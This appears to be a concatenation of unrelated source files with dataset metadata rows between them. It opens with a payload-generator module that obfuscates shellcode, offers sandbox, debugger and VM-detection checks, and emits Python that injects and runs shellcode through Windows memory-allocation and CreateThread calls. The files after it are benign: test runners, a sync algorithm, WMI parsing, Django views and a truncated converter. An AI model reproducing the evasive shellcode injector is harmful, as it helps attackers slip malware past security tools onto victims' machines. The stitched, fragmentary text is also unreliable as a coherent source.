"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"],
"INJECT_METHOD" : ["Virtual", "Virtual, Void, or Heap"],
"EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days"],
"HOSTNAME" : ["X", "Optional: Required system hostname"],
"DOMAIN" : ["X", "Optional: Required internal domain"],
"PROCESSORS" : ["X", "Optional: Minimum number of processors"],
"USERNAME" : ["X", "Optional: The required user account"],
"CLICKTRACK" : ["X", "Optional: Minimum number of clicks to execute payload"],
"UTCCHECK" : ["FALSE", "Optional: Validates system does not use UTC timezone"],
"VIRTUALFILES" : ["FALSE", "Optional: Check if VM supporting files exist"],
"VIRTUALDLLS" : ["FALSE", "Check for dlls loaded in memory"],
"CURSORMOVEMENT" : ["FALSE", "Check if cursor is in same position after 30 seconds"],
"USERPROMPT" : ["FALSE", "Make user click prompt prior to execution"],
"MINRAM" : ["FALSE", "Check for at least 3 gigs of RAM"],
"SANDBOXPROCESS" : ["FALSE", "Check for common sandbox processes"],
"DETECTDEBUG" : ["FALSE", "Check if debugger is present"],
"SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"]
}
def generate(self):
# Random letter substition variables
encode_with_this = random.choice(self.hex_letters)
decode_with_this = random.choice(self.non_hex_letters)
# Generate Random Variable Names
subbed_shellcode_variable_name = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_decoded_letter = evasion_helpers.randomString()
rand_correct_letter = evasion_helpers.randomString()
rand_sub_scheme = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
Shellcode = Shellcode.encode('unicode_escape')
Shellcode = Shellcode.decode('ascii')
Shellcode = Shellcode.replace(encode_with_this, decode_with_this).replace('\\', '\\\\')
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# Add in the letter switching code
payload_code += '\t' * num_tabs_required + 'import codecs\n'
payload_code += '\t' * num_tabs_required + rand_decoded_letter + ' = b\'%s\'\n' % decode_with_this
payload_code += '\t' * num_tabs_required + rand_correct_letter + ' = b\'%s\'\n' % encode_with_this
payload_code += '\t' * num_tabs_required + rand_sub_scheme + ' = bytes.maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = b\'' + Shellcode.replace('\\\\', '\\') +'\'\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' * num_tabs_required + subbed_shellcode_variable_name + ', _ = codecs.escape_decode(' + subbed_shellcode_variable_name + ')\n'
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ subbed_shellcode_variable_name +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + subbed_shellcode_variable_name + ',' + randctypes + '.c_int(len(' + subbed_shellcode_variable_name + ')))\n'
payload_code += '\t' * num_tabs_required + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
| gpl-3.0 | -4,467,505,317,799,974,000 | 64.985507 | 336 | 0.613222 | false | 3.526723 | false | false | false |
dbarsam/python-vsgen | tests/__main__.py | 1 | 2305 | # -*- coding: utf-8 -*-
"""
This module executes vsgen unittests (i.e. all tests in the current folder). It exists as an alernative to the command line interface::
> python -m unittest discover --start-directory . --pattern test*.py
For more testing options see the unittest documentation available at https://docs.python.org/3.5/library/unittest.html.
This module exposes an __main__ entry point useful for test development (usually from an Python IDE) and not recommeded for normal test execution.
"""
import os
import sys
def main(argv=[]):
"""
Test main script
"""
import argparse
import unittest
parser = argparse.ArgumentParser(description='Executes the vsgen unit tests.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-n', '--testname', help='Specifies the test name to execute. This must be the fully qualified \'dotted\' path of the form \'package.module.class.function\' (e.g. \'tests.unit.test_feature.TestClass.test_function\'). If not provided all tests resolved from the internal test discovery process are executed.', action='append')
parser.add_argument('-f', '--testpattern', help='Specifies the test file pattern to execute during test discovery. If not provided all tests resolved from the internal test discovery process are executed.', default='test*.py')
parser.add_argument('-p', '--testpath', help='Specifies the test path for test discovery. If not provided, the internal test discovery uses the current directory.', default=os.path.dirname(os.path.realpath(__file__)))
args = parser.parse_args(argv[1:])
loader = unittest.TestLoader()
if args.testname:
testsuite = loader.loadTestsFromNames(args.testname)
else:
testsuite = loader.discover(args.testpath, args.testpattern)
runner = unittest.TextTestRunner(verbosity=2)
result = runner.run(testsuite)
return 0 if not result.failures and not result.errors else 1
if __name__ == '__main__':
# To use this package as an application we need to correct the sys.path
module_path = os.path.dirname(os.path.realpath(__file__))
package_path = os.path.normpath(os.path.join(module_path, '..'))
if package_path not in sys.path:
sys.path.append(package_path)
sys.exit(main(sys.argv))
| mit | 1,336,034,135,707,171,300 | 51.386364 | 351 | 0.71974 | false | 4.022688 | true | false | false |
pombredanne/https-gitlab.lrde.epita.fr-vcsn-vcsn | tests/python/complete.py | 1 | 1949 | #! /usr/bin/env python
import vcsn
from test import *
# check complete algorithm
# ------------------------
def check(i, o):
if isinstance(i, str):
i = vcsn.automaton(i)
CHECK(not i.is_complete())
o = vcsn.automaton(o)
CHECK(o.is_complete())
CHECK_EQ(o, i.complete())
# Idempotence.
CHECK_EQ(o, o.complete())
check('''
digraph
{
vcsn_context = "lal_char(abcd), b"
I -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
1 -> 2 [label = "c"]
2 -> F
}
''', '''
digraph
{
vcsn_context = "lal_char(abcd), b"
rankdir = LR
{
node [shape = point, width = 0]
I0
F2
}
{
node [shape = circle]
0
1
2
3 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
0 -> 2 [label = "b"]
0 -> 3 [label = "c, d", color = DimGray]
1 -> 2 [label = "c"]
1 -> 3 [label = "a, b, d", color = DimGray]
2 -> F2
2 -> 3 [label = "a, b, c, d", color = DimGray]
3 -> 3 [label = "a, b, c, d", color = DimGray]
}
''')
# An automaton with an open context.
check(vcsn.b.expression('a').standard(), '''
digraph
{
vcsn_context = "letterset<char_letters(a)>, b"
rankdir = LR
edge [arrowhead = vee, arrowsize = .6]
{
node [shape = point, width = 0]
I0
F1
}
{
node [shape = circle, style = rounded, width = 0.5]
0
1
2 [color = DimGray]
}
I0 -> 0
0 -> 1 [label = "a"]
1 -> F1
1 -> 2 [label = "a", color = DimGray]
2 -> 2 [label = "a", color = DimGray]
}
''')
# An automaton without initial state.
check('''
digraph
{
vcsn_context = "lal_char(a), b"
0 -> 0 [label = "a"]
0 -> F0
}
''', '''
digraph
{
vcsn_context = "lal_char(a), b"
rankdir = LR
{
node [shape = point, width = 0]
I1
F0
}
{
node [shape = circle]
0 [color = DimGray]
1 [color = DimGray]
}
I1 -> 1 [color = DimGray]
0 -> F0 [color = DimGray]
0 -> 0 [label = "a", color = DimGray]
1 -> 1 [label = "a", color = DimGray]
}
''')
| gpl-3.0 | 1,662,478,737,304,644,900 | 16.247788 | 55 | 0.50077 | false | 2.527886 | false | false | false |
fireeye/flare-wmi | python-cim/samples/show_CCM_RecentlyUsedApps.py | 1 | 2035 | import logging
from cim import CIM
from cim.objects import Namespace
def main(type_, path):
if type_ not in ("xp", "win7"):
raise RuntimeError("Invalid mapping type: {:s}".format(type_))
Values = ["FolderPath", "ExplorerFileName", "FileSize", "LastUserName", "LastUsedTime", "TimeZoneOffset",
"LaunchCount", "OriginalFileName", "FileDescription", "CompanyName", "ProductName", "ProductVersion",
"FileVersion", "AdditionalProductCodes", "msiVersion", "msiDisplayName", "ProductCode",
"SoftwarePropertiesHash", "ProductLanguage", "FilePropertiesHash", "msiPublisher"]
print("\t".join(Values))
c = CIM(type_, path)
try:
with Namespace(c, "root\\ccm\\SoftwareMeteringAgent") as ns:
for RUA in ns.class_("CCM_RecentlyUsedApps").instances:
RUAValues = []
for Value in Values:
try:
if Value == "LastUsedTime":
Time = str(RUA.properties[Value].value)
ExcelTime = "{}-{}-{} {}:{}:{}".format(Time[0:4], Time[4:6], Time[6:8], Time[8:10],
Time[10:12], Time[12:14])
RUAValues.append(ExcelTime)
elif Value == "TimeZoneOffset":
Time = str(RUA.properties[Value].value)
TimeOffset = '="{}"'.format(Time[-4:])
RUAValues.append(TimeOffset)
else:
RUAValues.append(str(RUA.properties[Value].value))
except KeyError:
RUAValues.append("")
print("\t".join(RUAValues))
except IndexError:
raise RuntimeError("CCM Software Metering Agent path 'root\\\\ccm\\\\SoftwareMeteringAgent' not found.")
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
import sys
main(*sys.argv[1:])
| apache-2.0 | -777,082,851,250,680,000 | 43.23913 | 115 | 0.519902 | false | 4.339019 | false | false | false |
poldrack/openfmri | openfmri_paper/2.8_make_allmean_file.py | 1 | 1497 | """
make alist of all contrasts/tasks
"""
import pickle
from get_contrasts_to_use import *
c=get_contrasts_to_use()
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
infodir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
f=open(os.path.join(infodir,'task_keys.pkl'),'rb')
task_keys=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_contrasts.pkl'),'rb')
contrasts=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_conditions.pkl'),'rb')
condition_keys=pickle.load(f)
f.close()
taskctr={'ds001': {1: 1},
'ds002': {1: 2, 2: 3, 3: 4},
'ds003': {1: 5},
'ds005': {1: 6},
'ds006A': {1: 7},
'ds007': {1: 8, 2: 9, 3: 10},
'ds008': {1: 11, 2: 12},
'ds011': {1: 13, 2: 14, 3: 15, 4: 16},
'ds017': {2: 17},
'ds051': {1: 18},
'ds052': {1: 19, 2: 20},
'ds101': {1: 21},
'ds102': {1: 22},
'ds107': {1: 23}}
taskdict={}
for ds in taskctr.iterkeys():
for t in taskctr[ds].iterkeys():
taskdict[taskctr[ds][t]]=[ds,t,task_keys[ds]['task%03d'%t],c[ds][t][0],contrasts[ds]['task%03d'%t]['contrasts'][c[ds][t][0]]]
meanzstatdir='/corral-repl/utexas/poldracklab/openfmri/shared2/mean_zstat/'
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
cmd='fslmerge -t %s/all_mean_zstat.nii.gz'%outdir
for t in range(1,24):
cmd += ' %s/mean_%s_task%03d_zstat%d_run1.nii.gz'%(meanzstatdir,taskdict[t][0],taskdict[t][1],taskdict[t][3])
print cmd
| bsd-2-clause | -8,475,441,843,590,455,000 | 27.245283 | 133 | 0.651971 | false | 2.275076 | false | false | false |
untitaker/vdirsyncer | vdirsyncer/sync/__init__.py | 1 | 11708 | # -*- coding: utf-8 -*-
'''
The `sync` function in `vdirsyncer.sync` can be called on two instances of
`Storage` to synchronize them. Apart from the defined errors, this is the only
public API of this module.
The algorithm is based on the blogpost "How OfflineIMAP works" by Edward Z.
Yang: http://blog.ezyang.com/2012/08/how-offlineimap-works/
Some modifications to it are explained in
https://unterwaditzer.net/2016/sync-algorithm.html
'''
import contextlib
import itertools
import logging
from ..exceptions import UserError
from ..utils import uniq
from .status import SubStatus, ItemMetadata
from .exceptions import BothReadOnly, IdentAlreadyExists, PartialSync, \
StorageEmpty, SyncConflict
sync_logger = logging.getLogger(__name__)
class _StorageInfo(object):
'''A wrapper class that holds prefetched items, the status and other
things.'''
def __init__(self, storage, status):
self.storage = storage
self.status = status
self._item_cache = {}
def prepare_new_status(self):
storage_nonempty = False
prefetch = []
def _store_props(ident, props):
try:
self.status.insert_ident(ident, props)
except IdentAlreadyExists as e:
raise e.to_ident_conflict(self.storage)
for href, etag in self.storage.list():
storage_nonempty = True
ident, meta = self.status.get_by_href(href)
if meta is None or meta.href != href or meta.etag != etag:
# Either the item is completely new, or updated
# In both cases we should prefetch
prefetch.append(href)
else:
# Metadata is completely identical
_store_props(ident, meta)
# Prefetch items
for href, item, etag in (self.storage.get_multi(prefetch)
if prefetch else ()):
if not item.is_parseable:
sync_logger.warning(
'Storage "{}": item {} is malformed. '
'Please try to repair it.'
.format(self.storage.instance_name, href)
)
_store_props(item.ident, ItemMetadata(
href=href,
hash=item.hash,
etag=etag
))
self.set_item_cache(item.ident, item)
return storage_nonempty
def is_changed(self, ident):
old_meta = self.status.get(ident)
if old_meta is None: # new item
return True
new_meta = self.status.get_new(ident)
return (
new_meta.etag != old_meta.etag and # etag changed
# item actually changed
(old_meta.hash is None or new_meta.hash != old_meta.hash)
)
def set_item_cache(self, ident, item):
actual_hash = self.status.get_new(ident).hash
assert actual_hash == item.hash
self._item_cache[ident] = item
def get_item_cache(self, ident):
return self._item_cache[ident]
def sync(storage_a, storage_b, status, conflict_resolution=None,
force_delete=False, error_callback=None, partial_sync='revert'):
'''Synchronizes two storages.
:param storage_a: The first storage
:type storage_a: :class:`vdirsyncer.storage.base.Storage`
:param storage_b: The second storage
:type storage_b: :class:`vdirsyncer.storage.base.Storage`
:param status: {ident: (href_a, etag_a, href_b, etag_b)}
metadata about the two storages for detection of changes. Will be
modified by the function and should be passed to it at the next sync.
If this is the first sync, an empty dictionary should be provided.
:param conflict_resolution: A function that, given two conflicting item
versions A and B, returns a new item with conflicts resolved. The UID
must be the same. The strings `"a wins"` and `"b wins"` are also
accepted to mean that side's version will always be taken. If none
is provided, the sync function will raise :py:exc:`SyncConflict`.
:param force_delete: When one storage got completely emptied between two
syncs, :py:exc:`StorageEmpty` is raised for
safety. Setting this parameter to ``True`` disables this safety
measure.
:param error_callback: Instead of raising errors when executing actions,
call the given function with an `Exception` as the only argument.
:param partial_sync: What to do when doing sync actions on read-only
storages.
- ``error``: Raise an error.
- ``ignore``: Those actions are simply skipped.
- ``revert`` (default): Revert changes on other side.
'''
if storage_a.read_only and storage_b.read_only:
raise BothReadOnly()
if conflict_resolution == 'a wins':
conflict_resolution = lambda a, b: a
elif conflict_resolution == 'b wins':
conflict_resolution = lambda a, b: b
status_nonempty = bool(next(status.iter_old(), None))
with status.transaction():
a_info = _StorageInfo(storage_a, SubStatus(status, 'a'))
b_info = _StorageInfo(storage_b, SubStatus(status, 'b'))
a_nonempty = a_info.prepare_new_status()
b_nonempty = b_info.prepare_new_status()
if status_nonempty and not force_delete:
if a_nonempty and not b_nonempty:
raise StorageEmpty(empty_storage=storage_b)
elif not a_nonempty and b_nonempty:
raise StorageEmpty(empty_storage=storage_a)
actions = list(_get_actions(a_info, b_info))
storage_a.buffered()
storage_b.buffered()
for action in actions:
try:
action.run(
a_info,
b_info,
conflict_resolution,
partial_sync
)
except Exception as e:
if error_callback:
error_callback(e)
else:
raise
storage_a.flush()
storage_b.flush()
class Action:
def _run_impl(self, a, b): # pragma: no cover
raise NotImplementedError()
def run(self, a, b, conflict_resolution, partial_sync):
with self.auto_rollback(a, b):
if self.dest.storage.read_only:
if partial_sync == 'error':
raise PartialSync(self.dest.storage)
elif partial_sync == 'ignore':
self.rollback(a, b)
return
else:
assert partial_sync == 'revert'
self._run_impl(a, b)
@contextlib.contextmanager
def auto_rollback(self, a, b):
try:
yield
except BaseException as e:
self.rollback(a, b)
raise e
def rollback(self, a, b):
a.status.parent.rollback(self.ident)
class Upload(Action):
def __init__(self, item, dest):
self.item = item
self.ident = item.ident
self.dest = dest
def _run_impl(self, a, b):
if self.dest.storage.read_only:
href = etag = None
else:
sync_logger.info(u'Copying (uploading) item {} to {}'
.format(self.ident, self.dest.storage))
href, etag = self.dest.storage.upload(self.item)
assert href is not None
self.dest.status.insert_ident(self.ident, ItemMetadata(
href=href,
hash=self.item.hash,
etag=etag
))
class Update(Action):
def __init__(self, item, dest):
self.item = item
self.ident = item.ident
self.dest = dest
def _run_impl(self, a, b):
if self.dest.storage.read_only:
meta = ItemMetadata(hash=self.item.hash)
else:
sync_logger.info(u'Copying (updating) item {} to {}'
.format(self.ident, self.dest.storage))
meta = self.dest.status.get_new(self.ident)
meta.etag = \
self.dest.storage.update(meta.href, self.item, meta.etag)
self.dest.status.update_ident(self.ident, meta)
class Delete(Action):
def __init__(self, ident, dest):
self.ident = ident
self.dest = dest
def _run_impl(self, a, b):
meta = self.dest.status.get_new(self.ident)
if not self.dest.storage.read_only:
sync_logger.info(u'Deleting item {} from {}'
.format(self.ident, self.dest.storage))
self.dest.storage.delete(meta.href, meta.etag)
self.dest.status.remove_ident(self.ident)
class ResolveConflict(Action):
def __init__(self, ident):
self.ident = ident
def run(self, a, b, conflict_resolution, partial_sync):
with self.auto_rollback(a, b):
sync_logger.info(u'Doing conflict resolution for item {}...'
.format(self.ident))
meta_a = a.status.get_new(self.ident)
meta_b = b.status.get_new(self.ident)
if meta_a.hash == meta_b.hash:
sync_logger.info(u'...same content on both sides.')
elif conflict_resolution is None:
raise SyncConflict(ident=self.ident, href_a=meta_a.href,
href_b=meta_b.href)
elif callable(conflict_resolution):
item_a = a.get_item_cache(self.ident)
item_b = b.get_item_cache(self.ident)
new_item = conflict_resolution(item_a, item_b)
if new_item.hash != meta_a.hash:
Update(new_item, a).run(a, b, conflict_resolution,
partial_sync)
if new_item.hash != meta_b.hash:
Update(new_item, b).run(a, b, conflict_resolution,
partial_sync)
else:
raise UserError('Invalid conflict resolution mode: {!r}'
.format(conflict_resolution))
def _get_actions(a_info, b_info):
for ident in uniq(itertools.chain(a_info.status.parent.iter_new(),
a_info.status.parent.iter_old())):
a = a_info.status.get_new(ident)
b = b_info.status.get_new(ident)
if a and b:
a_changed = a_info.is_changed(ident)
b_changed = b_info.is_changed(ident)
if a_changed and b_changed:
# item was modified on both sides
# OR: missing status
yield ResolveConflict(ident)
elif a_changed and not b_changed:
# item was only modified in a
yield Update(a_info.get_item_cache(ident), b_info)
elif not a_changed and b_changed:
# item was only modified in b
yield Update(b_info.get_item_cache(ident), a_info)
elif a and not b:
if a_info.is_changed(ident):
# was deleted from b but modified on a
# OR: new item was created in a
yield Upload(a_info.get_item_cache(ident), b_info)
else:
# was deleted from b and not modified on a
yield Delete(ident, a_info)
elif not a and b:
if b_info.is_changed(ident):
# was deleted from a but modified on b
# OR: new item was created in b
yield Upload(b_info.get_item_cache(ident), a_info)
else:
# was deleted from a and not changed on b
yield Delete(ident, b_info)
| mit | -1,180,072,998,141,565,400 | 34.91411 | 78 | 0.562948 | false | 4.068103 | false | false | false |
automl/SpySMAC | cave/analyzer/base_analyzer.py | 1 | 5492 | import logging
from collections import OrderedDict
from typing import Tuple
from bokeh.io import output_notebook
from bokeh.plotting import show
from cave.html.html_builder import HTMLBuilder
from cave.reader.runs_container import RunsContainer
from cave.utils.exceptions import Deactivated
class BaseAnalyzer(object):
"""
The base class for analyzing methods. To create a new analyzer, inherit from this class and extend.
If you already have an analyzer, but need a wrapper to call it, also inherit it from this class.
You should overwrite the "get_name"-method.
Currently the initialization calls the analysis. After the analyzer ran, the results should be saved to the member
self.result, which is a dictionary with a defined structure.
The docstrings (this part) will be used to display a tooltip / help for the analyzer, so it should be a descriptive
and concise small paragraph describing the analyzer and it's results.
Remember to call super.__init__(runscontainer) in your analyzer's __init__-method. This will initialize the logger,
name and important attributes.
All configurator data is available via the self.runscontainer.
"""
def __init__(self,
runscontainer: RunsContainer,
*args,
**kwargs):
"""
runscontainer: RunsContainer
contains all important information about the configurator runs
"""
self.logger = logging.getLogger(self.__module__ + '.' + self.__class__.__name__)
self.name = self.get_name()
self.logger.debug("Initializing %s", self.name)
self.runscontainer = runscontainer
self.result = OrderedDict()
self.error = False
options = self.runscontainer.analyzing_options
if self.name not in options.sections():
self.logger.warning("Please state in the analyzing options whether or not to run this Analyzer "
"(simply add a line to the .ini file containing [{}])".format(self.name))
elif not options[self.name].getboolean('run'):
raise Deactivated("{0} has been deactivated in the options. To enable, just set "
"[{0}][run] = True in the .ini file or pass the appropriate flags.".format(self.name))
self.options = options[self.name]
for k, v in kwargs.items():
if v is not None:
self.options[k] = v
self.logger.debug("{} initialized with options: {}".format(self.name, str(dict(self.options))))
def plot_bokeh(self):
"""
This function should recreate the bokeh-plot from scratch with as little overhead as possible. This is needed to
show the bokeh plot in jupyter AND save it to the webpage. The bokeh plot needs to be recreated to be displayed
in different outputs for reasons beyond out control. So save all analysis results in the class and simply redo
the plotting with this function.
This function needs to be called if bokeh-plots are to be displayed in notebook AND saved to html-result.
"""
raise NotImplementedError()
def get_html(self, d=None, tooltip=None) -> Tuple[str, str]:
"""General reports in html-format, to be easily integrated in html-code. WORKS ALSO FOR BOKEH-OUTPUT.
Parameters
----------
d: Dictionary
a dictionary that will be later turned into a website
tooltip: string
tooltip to be displayed in report. optional, will overwrite the docstrings that are used by default.
Returns
-------
script, div: str, str
header and body part of html-code
"""
if len(self.result) == 1 and None in self.result:
self.logger.debug("Detected None-key, abstracting away...")
self.result = self.result[None]
if d is not None:
d[self.name] = self.result
d[self.name]['tooltip'] = tooltip if tooltip is not None else self.__doc__
script, div = HTMLBuilder("", "", "").add_layer(None, self.result)
combine = "\n\n".join([script, div])
return combine
def get_jupyter(self):
"""Depending on analysis, this creates jupyter-notebook compatible output."""
bokeh_plots = self.check_for_bokeh(self.result)
if bokeh_plots:
self.logger.warning("Bokeh plots cannot be re-used for notebook if they've already been \"components\"'ed. "
"To be sure, get_jupyter should be overwritten for bokeh-producing analyzers.")
output_notebook()
for bokeh_plot in bokeh_plots:
show(bokeh_plot)
else:
from IPython.core.display import HTML, display
display(HTML(self.get_html()))
@classmethod
def check_for_bokeh(cls, d):
"""
Check if there is bokeh-plots in the output of this analyzer by checking the result-dictionary for the bokeh
keyword.
"""
result = [] # all bokeh models
for k, v in d.items():
if isinstance(v, dict):
res = cls.check_for_bokeh(v)
if res:
result.extend(res)
if k == 'bokeh':
result.append(v)
return result
def get_name(self):
return self.__class__.__name__ # Back-up, can be overwritten, will be used as a name for analysis
| bsd-3-clause | -1,194,562,411,713,696,500 | 44.766667 | 120 | 0.628186 | false | 4.483265 | false | false | false |
lizardsystem/lizard5-apps | lizard_rainapp/views.py | 1 | 5811 | # (c) Nelen & Schuurmans. GPL licensed, see LICENSE.rst.
# -*- coding: utf-8 -*-
"""Views for the RainApp, mostly a page to upload new region shapefiles."""
# Python 3 is coming
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import io
import logging
import operator
import os
import shutil
import tempfile
import zipfile
import shapefile
from django.contrib.gis.geos import GEOSGeometry
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import Http404
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.views.generic import TemplateView
from django.views.generic import View
from lizard_ui.views import ViewContextMixin
from . import forms
from . import models
logger = logging.getLogger(__name__)
class AdminView(ViewContextMixin, TemplateView):
template_name = "lizard_rainapp/admin.html"
def dispatch(self, request, *args, **kwargs):
if not request.user.has_perm('lizard_rainapp.change_geoobject'):
raise PermissionDenied()
return super(AdminView, self).dispatch(request, *args, **kwargs)
def get(self, request):
self.form = forms.UploadShapefileForm()
return super(AdminView, self).get(request)
def post(self, request):
self.form = forms.UploadShapefileForm(
request.POST, request.FILES)
if not self.form.is_valid():
return super(AdminView, self).get(request)
try:
self.save_shape()
finally:
self.form.clean_temporary_directory()
return HttpResponseRedirect(
reverse("lizard_rainapp_admin"))
def get_field(self, feature, fieldname, default=None):
try:
name = self.form.cleaned_data[fieldname]
return feature.GetField(
feature.GetFieldIndex(name.encode('utf8')))
except ValueError:
return default
def save_shape(self):
rainappconfig = self.form.cleaned_data['config']
# First, delete old data
models.GeoObject.objects.filter(
config=rainappconfig).delete()
shape = self.form.open_shapefile()
layer = shape.GetLayer()
num_features = 0
for feature in layer:
geom = feature.GetGeometryRef()
models.GeoObject.objects.create(
municipality_id=self.get_field(feature, 'id_field'),
name=self.get_field(feature, 'name_field'),
x=self.get_field(feature, 'x_field'),
y=self.get_field(feature, 'y_field'),
area=self.get_field(feature, 'area_field'),
geometry=GEOSGeometry(geom.ExportToWkt(), srid=4326),
config=rainappconfig)
num_features += 1
logger.debug("Added {} features.".format(num_features))
def rainapp_configs(self):
return models.RainappConfig.objects.all()
class DownloadShapeView(View):
def dispatch(self, request, *args, **kwargs):
if not request.user.has_perm('lizard_rainapp.change_geoobject'):
raise PermissionDenied()
return super(DownloadShapeView, self).dispatch(
request, *args, **kwargs)
def get(self, request, slug):
try:
rainappconfig = models.RainappConfig.objects.get(
slug=slug)
except models.RainappConfig.DoesNotExist:
raise Http404()
if not rainappconfig.has_geoobjects:
raise Http404()
bytebuffer = self.save_data_to_zip(rainappconfig)
# Setup HTTPResponse for returning a zip file
response = HttpResponse(content_type='application/zip')
response['Content-Disposition'] = (
'attachment; filename={}.zip'.format(slug))
response.write(bytebuffer.read())
return response
def save_data_to_zip(self, rainappconfig):
# Save a shapefile to a temp directory
temp_dir = tempfile.mkdtemp()
try:
shapefile_path = os.path.join(
temp_dir, rainappconfig.slug)
shp = shapefile.Writer(shapefile.POLYGON)
shp.field(b'ID_NS')
shp.field(b'ID')
shp.field(b'X', b'F', 11, 5)
shp.field(b'Y', b'F', 11, 5)
shp.field(b'AREA', b'F', 11, 5)
for geo in models.GeoObject.objects.filter(config=rainappconfig):
if str(geo.geometry).startswith('MULTIPOLYGON'):
# For pyshp, multipolygons are basically normal
# polygons with all the parts after each other. Meaning
# we need to add them together them by hand.
geometry = [
[list(l) for l in polygon] for polygon in geo.geometry]
geometry = reduce(operator.add, geometry, [])
else:
geometry = [list(l) for l in geo.geometry]
shp.poly(parts=geometry)
shp.record(
geo.municipality_id,
geo.name,
geo.x,
geo.y,
geo.area)
shp.save(shapefile_path)
# Create a zipfile in a BytesIO buffer
bytebuffer = io.BytesIO()
zipf = zipfile.ZipFile(bytebuffer, 'w', zipfile.ZIP_DEFLATED)
for filename in os.listdir(temp_dir):
zipf.write(os.path.join(temp_dir, filename), filename)
zipf.close()
bytebuffer.seek(0)
return bytebuffer
finally:
# Remove temporary directory
shutil.rmtree(temp_dir)
| lgpl-3.0 | 6,633,258,897,341,782,000 | 31.646067 | 79 | 0.601101 | false | 4.153681 | true | false | false |
xigt/freki | freki/text2freki.py | 1 | 6059 | from freki.serialize import FrekiDoc, FrekiBlock, FrekiLine
import codecs
import re
import chardet
import logging
import argparse
def run(args):
frek = read_and_convert(args.infile, args.igtfile, args.encoding, args.detect)
out = open(args.outfile, 'w', encoding='utf8')
out.write(str(frek))
def convert_text(doc_id, text, span_text=None):
"""
Convert a string to freki
:param doc_id: name of document
:param text: text of document
:param span_text: text identifying IGT spans, if available
:return: freki object
"""
w_index = 1
wo_index = 1
